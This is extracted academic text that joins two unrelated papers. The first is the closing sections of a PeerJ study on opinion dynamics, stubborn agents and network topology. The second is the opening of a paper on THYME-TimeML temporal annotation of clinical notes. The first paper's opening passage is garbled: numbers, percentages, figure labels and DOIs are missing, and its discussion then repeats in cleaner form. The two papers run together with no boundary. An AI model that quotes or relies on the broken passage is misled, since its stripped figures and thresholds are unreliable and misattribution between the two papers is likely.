peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure tolerance (θ ) and opinion change (ω) evolution with the increasing concentration of evenly distributed stubborn agents (sa) and increasing network sizes. values over the five topologies for an increasing concentration of evenly distributed stubborn agents. (a) and (b) θ and ω respective values, over the five topologies when the size of the network is fixed as n = , , and the concentration of stubborn agents ranges from % to %. 
(d), (d), (e), and (f) tolerance θ stabilization values at which social balancing occurs over increasing network sizes (n = – , nodes) on mesh, small-world, ba, and wsdd networks, respectively. topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and small-world topologies are equivalent with the mesh topology as the society becomes saturated with stubborn agents (i.e., see figs. a and b in terms of tolerance θ and opinion change ω, respectively). finally, the saturated behavior groups together the ba and wsdd topologies, both of which have the feature of degree-driven preferential attachment. the two topologies show smaller responsiveness to social balancing. as depicted in figs. a and b, the critical point of stubborn agents concentration for ba is by far the greatest one (i.e., σ = %) and the maximum tolerance θ reached is the smallest among the simulations aiming at the impact of topology ( %). the wsdd topology shows a better response, at a much lower critical stubborn agents concentration point (σ = %) and reaches social balance at θ = %. impact of network size when analyzing the opinion change at society level, the same observations and classifi- cation are valid for all other network sizes. the larger the size n is, the more accurate the delimitation shown in figs. a and b becomes. the impact of size offers a comparison of different tolerance stabilization on the same topology. the results in figs. c– f show how well the social balancing effect scales with increasing sizes of the network. the behavior of meshes, presented in fig. c, shows a linearly proportional increase of the critical stubborn agents concentration σ (around – %) in accordance with the network size n . a similar evolution is visible in fig. f, on networks with preferential attachment, where the required σ is also proportionally bigger on larger networks. in figs. d and e, the random and small-world networks exhibit similar behavioral patterns: they achieve the critical point σ with maximal opinion change, and then evolve towards intolerance at a pace that is corroborated with n (i.e., a slower drop in tolerance for larger networks occurs). the results presented in fig. contains averages stemming from multiple experiments run in socialsim, then processed separately in microsoft excel. in figs. c– f, the points on the ox axis are fixed sa concentrations which are used throughout these exper- iments, and the values on the oy axis are averages obtained from multiple runs (i.e., ). an individual graph from one sub-figure is based on (different sa concentrations) × experiments = simulations. one subfigure is the result of × = simulations, therefore fig. is based on × = simulations. all simulations presented in this section confirm our main observations (twitter, memetracker, yelp) on opinion formation phases and phase transition towards social balancing. discussion the results for the proposed tolerance-based opinion interaction model show that, if indi- vidual traits are considered for modeling social agents, then we can realistically reproduce real-world dynamical features of opinion formation such as opinion formation phases, as well as their evolution towards social balancing. at the same time, we demonstrate that the dynamics of opinion formation is influenced by topology, network size and stubborn agent topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
Discussion

The results for the proposed tolerance-based opinion interaction model show that, if individual traits are considered when modeling social agents, we can realistically reproduce real-world dynamical features of opinion formation, such as opinion formation phases, as well as their evolution towards social balancing. At the same time, we demonstrate that the dynamics of opinion formation is influenced by topology, network size, and stubborn agent (opinion source) distribution across the entire population. Overall, the topology seems to have the strongest influence on opinion formation and spread; this can be summarized by the following tendencies:

• Responsive behavior: tolerance stabilization is attained right after reaching a relatively low critical ratio of stubborn agents; inserting additional stubborn agents entails a drop in autonomy and opinion flow. This behavior is achieved by random and small-world topologies, and it can be motivated by the uniform degree distribution and the existence of both local and long-range links, which foster opinion diversity and social balancing; it can be representative of a decentralized and democratic society.

• Linear behavior: the critical threshold at which tolerance becomes stable for mesh topologies increases linearly with the stubborn agent concentration. The mesh topology corresponds to a limited, almost "autistic" social interaction behavior (where each agent only interacts with close-proximity neighbors); therefore, the probability of opinion diversity only increases with the proportional addition of stubborn agents. For meshes, social balancing is attained only if a substantial number of stubborn agents is inserted.

• Saturated behavior: tolerance converges slowly around a specific low value. This behavior is achieved in BA and WSDD networks. Due to the nature of these topologies, even though long-range links exist, nodes tend to be preferentially attached to the same hub nodes, and thus to the same opinion sources. The number of stubborn agents required to reach social balance is much higher, and the resulting balance saturates quickly. It is thus a conservative, stratified and oligarchic type of society, which reacts later and more slowly to new stimuli. Most individuals within this type of society remain intolerant, and opinion change is treated as suspicious and non-credible.

Besides these original contributions, the results obtained with our model confirm prior studies which show how individuals converge towards the state of their ingroup (Moons et al.; Van der Schalk et al.). This is especially noticeable on networks with high modularity, like the WSDD network, in which every member of a community converges towards the community's dominant opinion, yet every community converges towards a different state.

An important real-world aspect of our new tolerance model (which assumes that the level of acceptance of neighboring opinions evolves over time) is that the tolerance level of an agent θi(t) is proportional to the degree of the node. In other words, the more neighbors a node has, the more likely it is to receive different influences, which can sustain a higher tolerance level. This observation is backed up by a recent study showing that individuals with a higher (in)degree are less likely to be influenced, and that the influence of friends is not significantly moderated by the friends' indegree or friendship reciprocity (Geven, Weesie & Van Tubergen). The results rendered with our tolerance model also fall in line with a research direction started by Gross & Blasius, where the authors show that there is self-organization in all adaptive networks, including multi-agent opinion networks.
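As a rough illustration only, the three regimes summarized above could be told apart automatically from a measured tolerance-versus-concentration curve with a heuristic like the following; the thresholds and the example curves are invented for this sketch and play no role in our analysis.

```python
def classify_response(sigmas, tolerances, high=0.8, low=0.4):
    """Heuristically label a tolerance-vs-concentration curve as 'responsive',
    'linear', or 'saturated'. Thresholds are illustrative assumptions."""
    peak = max(tolerances)
    peak_pos = sigmas[tolerances.index(peak)] / sigmas[-1]
    if peak < low:
        return "saturated"    # tolerance converges around a low value (BA, WSDD)
    if peak >= high and peak_pos <= 0.5:
        return "responsive"   # early, sharp rise to high tolerance (random, small-world)
    return "linear"           # gradual, proportional increase (mesh)

# Made-up example curves over a small concentration sweep:
sig = [0.05, 0.10, 0.15, 0.20, 0.25]
print(classify_response(sig, [0.10, 0.90, 0.85, 0.80, 0.75]))  # responsive
print(classify_response(sig, [0.10, 0.15, 0.20, 0.30, 0.35]))  # saturated
print(classify_response(sig, [0.20, 0.35, 0.50, 0.65, 0.80]))  # linear
```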
Our real-world observations and opinion simulation results show a similar topological self-organization based on the topological properties of the stubborn agents.

Finally, the study of opinion dynamics through our proposed concept of social balancing shows key features that may be used in practical applications, such as marketing or conflict resolution. Under the requirement of keeping the social state stable while never reaching intolerance, we provide a classification of network topologies based on the social balancing property. Networks with the democratic small-world structure promote balancing; the phenomenon is also exhibited if there is a high enough concentration of stubborn agents to stabilize opinion in mesh networks. If there are significantly fewer stubborn agents in the network, balancing will only be achieved if one side uses a placement strategy to counter its rivals (Gionis, Terzi & Tsaparas). A small-world network will not offer an advantage to any of the opinions, due to the link layout and uniform degree distribution. On the other hand, the oligarchic scale-free topology shows the clear importance of strategically placed agents in hub nodes, which intrinsically renders the opposing nodes on the lower levels of the tree virtually powerless; the balancing phenomenon does not occur in networks with scale-free properties. Clearly, the social balancing concept remains open for further debate, improvement, and real-world validation.

Additional information and declarations

Funding
The authors received no funding for this work.

Competing interests
Radu Marculescu is an academic editor for PeerJ Computer Science.

Author contributions
• Alexandru Topirceanu and Mihai Udrescu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.
• Mircea Vladutiu conceived and designed the experiments, analyzed the data, and reviewed drafts of the paper.
• Radu Marculescu conceived and designed the experiments, analyzed the data, wrote the paper, and reviewed drafts of the paper.

Data availability
The following information was supplied regarding data availability:
Our social network interaction simulator SocialSim is available at https://sites.google.com/site/alexandrutopirceanu/projects/socialsim and at www.cs.upt.ro/~alext/socialsim.
For our analysis, we also used the following publicly available datasets:
The MemeTracker dataset: http://snap.stanford.edu/data/memetracker.html
The Twitter dataset: http://snap.stanford.edu/data/twitter.html
The Yelp dataset: http://www.yelp.com/dataset_challenge

References

Acemoglu D, Como G, Fagnani F, Ozdaglar A. Opinion fluctuations and disagreement in social networks. Mathematics of Operations Research.
Acemoglu D, Ozdaglar A. Opinion dynamics and learning in social networks. Dynamic Games and Applications.
Acemoglu D, Ozdaglar A, Yildiz E. Diffusion of innovations in social networks. In: IEEE Conference on Decision and Control and European Control Conference (CDC-ECC). IEEE.
Albert R, Barabási A-L. Statistical mechanics of complex networks. Reviews of Modern Physics.
Axelrod R. The dissemination of culture: a model with local convergence and global polarization. Journal of Conflict Resolution.
Bandyopadhyay S, Rao AR, Sinha BK, Sinha BK. Models for social networks with statistical applications. Sage.
Barabási A-L, Albert R. Emergence of scaling in random networks. Science.
Biswas S, Chandra AK, Chatterjee A, Chakrabarti BK. Phase transitions and non-equilibrium relaxation in kinetic models of opinion formation. Journal of Physics: Conference Series. IOP Publishing.
Catanzaro M, Boguna M, Pastor-Satorras R. Generation of uncorrelated random scale-free networks. Physical Review E.
Centola D, Macy M. Complex contagions and the weakness of long ties. American Journal of Sociology.
Chau H, Wong C, Chow F, Fung C-HF. Social judgment theory based model on opinion formation, polarization and evolution. Physica A: Statistical Mechanics and its Applications.
Chen G, Wang X, Li X. Fundamentals of complex networks: models, structures and dynamics. John Wiley & Sons.
Chen Y, Zhang L, Huang J. The Watts–Strogatz network model developed by including degree distribution: theory and computer simulation. Journal of Physics A: Mathematical and Theoretical.
Clarkson JJ, Tormala ZL, Rucker DD, Dugan RG. The malleable influence of social consensus on attitude certainty. Journal of Experimental Social Psychology.
Das A, Gollapudi S, Munagala K. Modeling opinion dynamics in social networks. In: Proceedings of the ACM International Conference on Web Search and Data Mining. ACM.
Deffuant G, Neau D, Amblard F, Weisbuch G. Mixing beliefs among interacting agents. Advances in Complex Systems.
Deng L, Liu Y, Xiong F. An opinion diffusion model with clustered early adopters. Physica A: Statistical Mechanics and its Applications.
Duma A, Topirceanu A. A network motif based approach for classifying online social networks. In: IEEE International Symposium on Applied Computational Intelligence and Informatics (SACI). IEEE.
Easley D, Kleinberg J. Networks, crowds, and markets. Cambridge University Press.
Elkind D. Egocentrism in adolescence. Child Development.
Erdös P, Rényi A. On the evolution of random graphs. Publications of the Mathematical Institute of the Hungarian Academy of Sciences.
Fang H, Zhang J, Thalmann NM. A trust model stemmed from the diffusion theory for opinion evaluation. In: Proceedings of the International Conference on Autonomous Agents and Multi-Agent Systems. International Foundation for Autonomous Agents and Multiagent Systems.
Fonseca A. Modeling political opinion dynamics through social media and multi-agent simulation. In: First Doctoral Workshop for Complexity Sciences.
Fu P, Liao K. An evolving scale-free network with large clustering coefficient. In: International Conference on Control, Automation, Robotics and Vision (ICARCV). IEEE.
Galuba W, Aberer K, Chakraborty D, Despotovic Z, Kellerer W. Outtweeting the Twitterers: predicting information cascades in microblogs. In: Proceedings of the Conference on Online Social Networks.
Geven S, Weesie J, van Tubergen F. The influence of friends on adolescents' behavior problems at school: the role of ego, alter and dyadic characteristics. Social Networks.
Gionis A, Terzi E, Tsaparas P. Opinion maximization in social networks. arXiv preprint.
Golbeck J. Analyzing the social web. San Francisco: Morgan Kaufmann Publishers.
Gross T, Blasius B. Adaptive coevolutionary networks: a review. Journal of the Royal Society Interface.
Guille A, Hacid H, Favre C, Zighed DA. Information diffusion in online social networks: a survey. ACM SIGMOD Record.
Hegselmann R, Krause U. Opinion dynamics and bounded confidence models, analysis, and simulation. Journal of Artificial Societies and Social Simulation.
Holme P, Kim BJ. Growing scale-free networks with tunable clustering. Physical Review E.
Hołyst JA, Kacperski K, Schweitzer F. Phase transitions in social impact models of opinion formation. Physica A: Statistical Mechanics and its Applications.
Hussain O, Anwar Z, Saleem S, Zaidi F. Empirical analysis of seed selection criterion in influence mining for different classes of networks. In: Third International Conference on Cloud and Green Computing (CGC). IEEE.
Javarone MA, Squartini T. Conformism-driven phases of opinion formation on heterogeneous networks: the q-voter model case. arXiv e-prints.
Jian-Guo L, Yan-Zhong D, Zhong-Tuo W. Multistage random growing small-world networks with power-law degree distribution. Chinese Physics Letters.
Kempe D, Kleinberg J, Tardos É. Maximizing the spread of influence through a social network. In: Proceedings of the Ninth ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. ACM.
Lehmann J, Goncalves B, Ramasco JJ, Cattuto C. Dynamical classes of collective attention in Twitter. In: Proceedings of the International Conference on World Wide Web. ACM.
Lerman K, Yan X, Wu X-Z. The majority illusion in social networks. arXiv preprint.
Li Y, Chen W, Wang Y, Zhang Z-L. Influence diffusion dynamics and influence maximization in social networks with friend and foe relationships. In: Proceedings of the Sixth ACM International Conference on Web Search and Data Mining. ACM.
Li Y, Qian X, Wang D. Extended HK evolving network model. In: Chinese Control and Decision Conference (CCDC). IEEE.
Li L, Scaglione A, Swami A, Zhao Q. Trust, opinion diffusion and radicalization in social networks. In: Conference Record of the Forty-Fifth Asilomar Conference on Signals, Systems and Computers. IEEE.
Li L, Scaglione A, Swami A, Zhao Q. Phase transition in opinion diffusion in social networks. In: IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). IEEE.
Maxwell JC. Developing the leader within you. Thomas Nelson Publishers.
McDonald M, Wilson H. Marketing plans: how to prepare them, how to use them. Wiley.
Moons WG, Leonard DJ, Mackie DM, Smith ER. I feel our pain: antecedents and consequences of emotional self-stereotyping. Journal of Experimental Social Psychology.
Muchnik L, Aral S, Taylor SJ. Social influence bias: a randomized experiment. Science.
Nyhan B, Reifler J. When corrections fail: the persistence of political misperceptions. Political Behavior.
Pastor-Satorras R, Vespignani A. Epidemic spreading in scale-free networks. Physical Review Letters.
Riolo RL, Cohen MD, Axelrod R. Evolution of cooperation without reciprocity. Nature.
Roccas S, Amit A. Group heterogeneity and tolerance: the moderating role of conservation values. Journal of Experimental Social Psychology.
Ruan Z, Iniguez G, Karsai M, Kertesz J. Kinetics of social contagion. arXiv preprint.
Saito K, Ohara K, Yamagishi Y, Kimura M, Motoda H. Learning diffusion probability based on node attributes in social networks. In: Foundations of Intelligent Systems. Berlin Heidelberg: Springer.
Song C, Havlin S, Makse HA. Self-similarity of complex networks. Nature.
Strogatz SH. Exploring complex networks. Nature.
Sznajd-Weron K, Sznajd J. Opinion evolution in closed community. International Journal of Modern Physics C.
Topirceanu A, Udrescu M. SocialSim: a framework for opinion dynamics simulations. Available at http://www.cs.upt.ro/~alext/acsanet.
Tsvetovat M, Carley KM. Generation of realistic social network datasets for testing of analysis and simulation tools. Technical report, DTIC Document.
Valente TW, Fujimoto K, Unger JB, Soto DW, Meeker D. Variations in network boundary and type: a study of adolescent peer influences. Social Networks.
van der Schalk J, Fischer A, Doosje B, Wigboldus D, Hawk S, Rotteveel M, Hess U. Convergent and divergent responses to emotional displays of ingroup and outgroup. Emotion.
Wang XF, Chen G. Complex networks: small-world, scale-free and beyond. IEEE Circuits and Systems Magazine.
Wang J, Rong L. Evolving small-world networks based on the modified BA model. In: International Conference on Computer Science and Information Technology (ICCSIT). IEEE.
Watts DJ, Strogatz SH. Collective dynamics of small-world networks. Nature.
Weidlich W. Sociodynamics: a systematic approach to mathematical modelling in the social sciences. Nonlinear Phenomena in Complex Systems.
Windschitl PD, Rose JP, Stalkfleet MT, Smith AR. Are people excessive or judicious in their egocentrism? A modeling approach to understanding bias and accuracy in people's optimism. Journal of Personality and Social Psychology.
Yildiz E, Ozdaglar A, Acemoglu D, Saberi A, Scaglione A. Binary opinion dynamics with stubborn agents. ACM Transactions on Economics and Computation.
Zaidi F. Small world networks and clustered small world networks with random connectivity. Social Network Analysis and Mining.
Temporal annotation in the clinical domain

William F. Styler IV, Steven Bethard, Sean Finan, Martha Palmer, Sameer Pradhan, Piet C. de Groen, Brad Erickson, Timothy Miller, Chen Lin, Guergana Savova and James Pustejovsky
Department of Linguistics, University of Colorado at Boulder; Department of Computer and Information Sciences, University of Alabama at Birmingham; Children's Hospital Boston Informatics Program and Harvard Medical School; Mayo Clinic College of Medicine, Mayo Clinic, Rochester, MN; Department of Computer Science, Brandeis University

Abstract

This article discusses the requirements of a formal specification for the annotation of temporal information in clinical narratives. We discuss the implementation and extension of ISO-TimeML for annotating a corpus of clinical notes, known as the THYME corpus. To reflect the information task and the heavily inference-based reasoning demands of the domain, a new annotation guideline has been developed, "the THYME Guidelines to ISO-TimeML (THYME-TimeML)". To clarify which relations merit annotation, we distinguish between linguistically-derived and inferentially-derived temporal orderings in the text. We also apply a top-performing TempEval system to this new resource to measure the difficulty of adapting systems to the clinical domain. The corpus is available to the community and has been proposed for use in a SemEval task.
Introduction

There is a long-standing interest in temporal reasoning within the biomedical community (Savova et al.; Hripcsak et al.; Meystre et al.; Bramsen et al.; Combi et al.; Keravnou; Dolin; Irvine et al.; Sullivan et al.). This interest extends to the automatic extraction and interpretation of temporal information from medical texts, such as electronic discharge summaries and patient case summaries. Making effective use of temporal information from such narratives is a crucial step in the intelligent analysis of informatics for medical researchers, while an awareness of temporal information (both implicit and explicit) in a text is also necessary for many data mining tasks. It has also been demonstrated that the temporal information in clinical narratives can be usefully mined to provide information for some higher-level temporal reasoning (Zhao et al.). Robust temporal understanding of such narratives, however, has been difficult to achieve, due to the complexity of determining temporal relations among events, the diversity of temporal expressions, and the interaction with broader computational linguistic issues.

Recent work on electronic health records (EHRs) points to new ways to exploit and mine the information contained therein (Savova et al.; Roberts et al.; Zheng et al.; Turchin et al.). We target two main use cases for extracted data. First, we hope to enable interactive displays and summaries of the patient's records for the physician at the time of visit, making a comprehensive review of the patient's history both faster and less prone to oversights. Second, we hope to enable temporally-aware secondary research across large databases of medical records (e.g., "What percentage of patients who undergo procedure X develop side-effect Y within Z months?"). Both of these applications require the extraction of time and date associations for critical events and the relative ordering of events during the patient's period of care, all from the various records which make up a patient's EHR. Although we have these two specific applications in mind, the schema we have developed is generalizable and could potentially be embedded in a wide variety of biomedical use cases.

Narrative texts in EHRs are temporally rich documents that frequently contain assertions about the timing of medical events, such as visits, laboratory values, symptoms, signs, diagnoses, and procedures (Bramsen et al.; Hripcsak et al.; Zhou et al.). Temporal representation and reasoning in the medical record are difficult due to: (1) the diversity of time expressions; (2) the complexity of determining temporal relations among events (which are often left to inference); (3) the difficulty of handling the temporal granularity of an event; and (4) general issues in natural language processing (e.g., ambiguity, anaphora, ellipsis, conjunction). As a result, the signals used for reconstructing a timeline can be both domain-specific and complex, and are often left implicit, requiring significant domain knowledge to accurately detect and interpret. In this paper, we discuss the demands of accurately annotating such temporal information in clinical notes.
We describe an implementation and extension of ISO-TimeML (Pustejovsky et al.), developed specifically for the clinical domain, which we refer to as the "THYME Guidelines to ISO-TimeML" ("THYME-TimeML"), where THYME stands for "Temporal Histories of Your Medical Events". A simplified version of these guidelines formed the basis for the i2b2 medical-domain temporal relation challenge (Sun et al.). This work is being developed in the context of the THYME project, whose goal is both to create robust gold standards for semantic information in clinical notes and to develop state-of-the-art algorithms to train and test on this dataset.

Deriving timelines from news text requires the concrete realization of context-dependent assumptions about temporal intervals, orderings and organization underlying the explicit signals marked in the text (Pustejovsky and Stubbs). Deriving patient history timelines from clinical notes also involves these types of assumptions, but there are special demands imposed by the characteristics of the clinical narrative. Due to both medical shorthand practices and general domain knowledge, many event-event relations are not signaled in the text at all, and rely on a shared understanding and common conceptual models of the progression of medical procedures available only to readers familiar with language use in the medical community. Identifying these implicit relations and temporal properties puts a heavy burden on the annotation process. As such, in the THYME-TimeML guideline, considerable effort has gone into both describing and proscribing the annotation of temporal orderings that are inferable only through domain-specific temporal knowledge.

Although the THYME guidelines describe a number of departures from the ISO-TimeML standard for expediency and ease of annotation, this paper focuses on those differences specifically motivated by the needs of the clinical domain, and on the consequences for systems built to extract temporal data in both the clinical and general domains.

The nature of clinical documents

In the THYME corpus, we have been examining a set of de-identified notes from a large healthcare practice (the Mayo Clinic), representing two distinct fields within oncology: brain cancer and colon cancer. (Although most patient information was removed, dates and temporal information were not modified, according to this project's specific data use agreement.) To date, we have principally examined two different general types of clinical narrative in our EHRs: clinical notes and pathology reports.

Clinical notes are records of physician interactions with a patient, and often include multiple, clearly delineated sections detailing different aspects of the patient's care and present illness. These notes are fairly generic across institutions and specialties, and although some terms and inferences may be specific to a particular type of practice (such as oncology), they share a uniform structure and pattern. The 'history of present illness', for example, summarizes the course of the patient's chief complaint, as well as the interventions and diagnostics which have thus far been attempted. In other sections, the doctor may outline her current plan for the patient's treatment, then later describe the patient's specific medical history, allergies, care directives, and so forth.

Most critically for temporal reasoning, each clinical note reflects a single time in the patient's treatment history at which all of the doctor's statements are accurate (the DocTime), and each section tends to describe events of a particular timeframe. (One complication is the propensity of doctors and automated systems to later update sections in a note without changing the timestamp or metadata; we have added a SectionTime to keep these updated sections from affecting our overall timeline.) For example, 'history of present illness' predominantly describes events occurring before the DocTime, whereas 'medications' provides a snapshot at the DocTime, and 'ongoing care orders' discusses events which have not yet occurred.
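This per-section tendency could be encoded as a simple prior for pre-annotation or downstream systems. The sketch below is purely illustrative: the section names, the label strings, and the idea of a fixed default are our assumptions, not part of the THYME-TimeML guidelines.

```python
# Illustrative only: a default temporal frame per note section, relative to
# the note's DocTime. Section names and labels are assumptions, not a
# THYME specification.
SECTION_DOCTIME_PRIOR = {
    "history of present illness": "BEFORE",   # mostly prior treatments and symptoms
    "medications":                "OVERLAP",  # snapshot at the time of the note
    "ongoing care orders":        "AFTER",    # events that have not yet occurred
}

def default_doctime_frame(section_name):
    """Return the default frame for a section, or None when there is no
    obvious prior (e.g., free-text discussion sections)."""
    return SECTION_DOCTIME_PRIOR.get(section_name.lower())

print(default_doctime_frame("Medications"))  # OVERLAP
```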
Clinical notes contain rich temporal information and background, moving fluidly from prior treatments and symptoms to present conditions to future interventions. They are also often rich with hypothetical statements ("if the tumor recurs, we can..."), each of which can form its own separate timeline.

By contrast, pathology notes are quite different. Such notes are generated by a medical pathologist upon receipt and analysis of specimens (ranging from tissue samples from a biopsy to excised portions of a tumor or organs). Pathology notes provide crucial information to the patient's doctor, confirming the malignancy (cancer) in samples, describing surgical margins (which indicate whether a tumor was completely excised), and classifying and 'staging' a tumor, describing the severity and spread of the cancer. Because the information in such notes pertains to samples taken at a single moment in time, they are temporally sparse, seldom referring to events before or after the examination of the specimen. However, they contain critical information about the state of the patient's illness and about the cancer itself, and must be interpreted to understand the history of the patient's illness.

Most importantly, in all EHRs, we must contend with the results of a fundamental tension in modern medical records: hyper-detailed records provide a crucial defense against malpractice litigation, but including such detail takes enormous time, which doctors seldom have. Given that these notes are written by and for medical professionals (who form a relatively insular speech community), a great many non-standard expressions, abbreviations, and assumptions of shared knowledge are used, which are simultaneously concise and detail-rich for others with similar backgrounds.

These time-saving devices can range from temporally loaded acronyms (e.g., 'qid', Latin for quater in die, 'four times daily'), to assumed orderings (a diagnostic test for a disorder is assumed to come before the procedure which treats it), and even to completely implicit events and temporal details. For example, consider the sentence in (1):

(1) Colonoscopy [date], nodule biopsies negative

We must understand that during the colonoscopy, the doctor obtained biopsies of nodules, which were packaged and sent to a pathologist, who reviewed them and determined them to be 'negative' (non-cancerous). In such documents, we must recover as much temporal detail as possible, even though it may be expressed in a way which is not easily understood outside of the medical community, let alone by linguists or automated systems. We must also be aware of the legal relevance of some events (e.g., "we discussed the possible side effects"), even when they may not seem relevant to the patient's actual care.
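To make the kind of inference required by (1) concrete, one possible explicit representation of the recovered events and orderings is sketched below. The event inventory, the relation labels, and the placeholder date are our own reading of the shorthand, shown for illustration; they are not the gold-standard annotation of this sentence.

```python
# Hypothetical unpacking of "Colonoscopy <date>, nodule biopsies negative".
# Event names, the placeholder date, and the relation labels are illustrative.
events = ["colonoscopy", "biopsy", "pathology_review", "negative_finding"]

relations = [
    ("<date>", "CONTAINS", "colonoscopy"),            # the date anchors the procedure
    ("colonoscopy", "CONTAINS", "biopsy"),            # biopsies taken during the procedure
    ("biopsy", "BEFORE", "pathology_review"),         # specimens sent out and reviewed later
    ("pathology_review", "CONTAINS", "negative_finding"),
]

for source, rel, target in relations:
    print(f"{source} --{rel}--> {target}")
```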
Finally, each specialty and note type has its own conventions. Within colon cancer notes, the American Joint Committee on Cancer (AJCC) staging codes (e.g., TNM codes, indicating the nature of the tumor, lymph node and metastasis involvement) are meticulously recorded, but they are largely absent from the brain cancer notes which make up the second corpus in our project. So, although clinical notes share many similarities, annotators without sufficient domain expertise may require additional training to adapt to the inferences and nuances of a new clinical subdomain.

Interpreting 'event' and temporal expressions in the clinical domain

Much prior work has been done on standardizing the annotation of events and temporal expressions in text. The most widely used approach is the ISO-TimeML specification (Pustejovsky et al.), an ISO standard that provides a common framework for annotating and analyzing time, events, and event relations. As defined by ISO-TimeML, an event refers to anything that can be said "to obtain or hold true, to happen or to occur". This is a broad notion of event, consistent with Bach's use of the term "eventuality" (Bach), as well as with the notion of fluents in AI (McCarthy).

Because the goals of the THYME project involve automatically identifying the clinical timeline for a patient from clinical records, the scope of what should be admitted into the domain of events is interpreted more broadly than in ISO-TimeML (our use of the term 'event' corresponds to the less specific ISO-TimeML term 'eventuality'). Within the THYME-TimeML guideline, an event is anything relevant to the clinical timeline, i.e., anything that would show up on a detailed timeline of the patient's care or life; the best single-word syntactic head for the event is then used as its span. For example, a diagnosis would certainly appear on such a timeline, as would a tumor, illness, or procedure. On the other hand, entities that persist throughout the relevant temporal period of the clinical timeline (endurants, in ontological circles) would not be considered event-like. This includes the patient, other humans mentioned (the patient's mother-in-law or the doctor), organizations (the emergency room), non-anatomical objects (the patient's car), and individual parts of the patient's anatomy (an arm is not an event unless missing or otherwise notable).

To meet our explicit goals, the THYME-TimeML guideline introduces two additional levels of interpretation beyond that specified by ISO-TimeML: (i) a well-defined task; and (ii) a clearly identified domain. By focusing on the creation of a clinical timeline from clinical narrative, the guideline imposes constraints that cannot be assumed for a broadly defined and domain-independent annotation schema.

Some events annotated under our guideline are considered meaningful and eventive mostly by virtue of a specific clinical or legal value. For example, AJCC staging codes (discussed above) are eventive only in the sense of the code being assigned to a tumor at a given moment in the patient's care. However, they are of such critical importance and informative value to doctors that we have chosen to annotate them specifically, so that they will show up on the patient's timeline in a clinical setting. Similarly, because of legal pressures to establish informed consent and patient knowledge of risk, entire paragraphs of clinical notes are dedicated to documenting the doctor's discussion of risks, plans, and alternative strategies.
As such, we annotate verbs of discussion ("we talked about the risks of this drug"), consent ("she agreed with the current plan"), and comprehension ("Mrs. Larsen repeated the potential side effects back to me"), even though they are more relevant to legal defense than to medical treatment.

It is also because of this grounding in clinical language that entities and other non-events are often interpreted in terms of their associated eventive properties. There are two major types for which this is a significant shift in semantic interpretation:

(2a) Medication as event: "Orders: Lariam twice daily."
(2b) Disorder as event: "Tumor of the left lung."

In both these cases, entities which are not typically marked as events are identified as such, because they contribute significant information to the clinical timeline being constructed. In (2a), for example, the TIMEX3 "twice daily" is interpreted as scoping over the eventuality of the patient taking the medication, not the prescription event. In sentence (2b), the "tumor" is interpreted as a stative eventuality of the patient having a tumor located within an anatomical region, rather than as an entity within an entity.

Within the medical domain, these eventive interpretations of medications, growths and status codes are unambiguous and consistent. Doctors in clinical notes (unlike in biomedical research texts) do not discuss medications without an associated (implicit) administering event, though some mentions may be hypothetical, generic or negated. Similarly, mentions of symptoms or disorders reflect occurrences in a patient's life, rather than abstract entities. With these interpretations in mind, we can safely infer, for instance, that all UMLS (Unified Medical Language System; Bodenreider) entities of the types Disorder, Chemical/Drug, Procedure and Sign/Symptom will be events. In general, in the medical domain, it is essential to read "between the lines" of the shorthand expressions used by the doctors, and to recognize the implicit events that are referred to by specific anatomical sites or medications.
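This inference can be expressed as a simple pre-annotation filter over the output of an upstream entity recognizer (assumed here, not shown); the sketch below mirrors the UMLS semantic groups named above but is illustrative rather than a description of our actual annotation pipeline.

```python
# UMLS semantic groups that the guideline treats as implicit EVENTs.
EVENT_SEMANTIC_GROUPS = {"Disorder", "Chemical/Drug", "Procedure", "Sign/Symptom"}

def candidate_events(umls_mentions):
    """umls_mentions: iterable of (text_span, semantic_group) pairs produced by
    an upstream entity recognizer (assumed, not shown). Returns the spans that
    could be pre-marked as EVENTs for annotator review."""
    return [span for span, group in umls_mentions if group in EVENT_SEMANTIC_GROUPS]

mentions = [("tumor", "Disorder"), ("left lung", "Anatomy"), ("Lariam", "Chemical/Drug")]
print(candidate_events(mentions))  # ['tumor', 'Lariam']
```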
Modifications to ISO-TimeML for the clinical domain

Overall, we have found that the specification required for temporal annotation in the clinical domain does not require substantial modification from existing specifications for the general domain. The clinical domain includes no shortage of inferences, shorthands, and unusual uses of language, but the structure of the underlying timeline is not unique. As a result, we have been able to adopt most of the framework from ISO-TimeML, adapting the guidelines where needed, as well as reframing the focus of what gets annotated. This is reflected in a comprehensive guideline incorporating the specific patterns and uses of events and temporal expressions seen in clinical data. This approach allows the resulting annotations to be interoperable with existing solutions, while still accommodating the major differences in the nature of the texts. Our guidelines, as well as the annotated data, are available at http://thyme.healthnlp.org (access to the corpus requires a data use agreement; more information about this process is available from the corpus website). Our extensions of the ISO-TimeML specification to the clinical domain are intended to address specific constructions, meanings, and phenomena in medical texts. Our schema differs from ISO-TimeML in a few notable ways.

Event properties

We have both simplified the ISO-TimeML coding of events and extended it to meet the needs of the clinical domain and the specific language goals of the clinical narrative. Consider, for example, how modal subordination is handled in ISO-TimeML. This involves the semantic characterization of an event as "likely", "possible", or as presented by observation, evidence, or hearsay. All of these are accounted for compositionally in ISO-TimeML within the SLINK (subordinating link) relation (Pustejovsky et al.). While accepting ISO-TimeML's definition of event modality, we have simplified the annotation task within the current guideline, so that events now carry attributes for "contextual modality", "contextual aspect" and "permanence".

Contextual modality allows the values ACTUAL, HYPOTHETICAL, HEDGED, and GENERIC. ACTUAL covers events which have actually happened, e.g., "we've noted a tumor". HYPOTHETICAL covers conditionals and possibilities, e.g., "if she develops a tumor". HEDGED is for situations where doctors proffer a diagnosis, but do so cautiously, to avoid legal liability for an incorrect diagnosis or for overlooking a correct one. For example:

(3a) The signal in the MRI is not inconsistent with a tumor in the spleen.
(3b) The rash appears to be measles, awaiting antibody test to confirm.

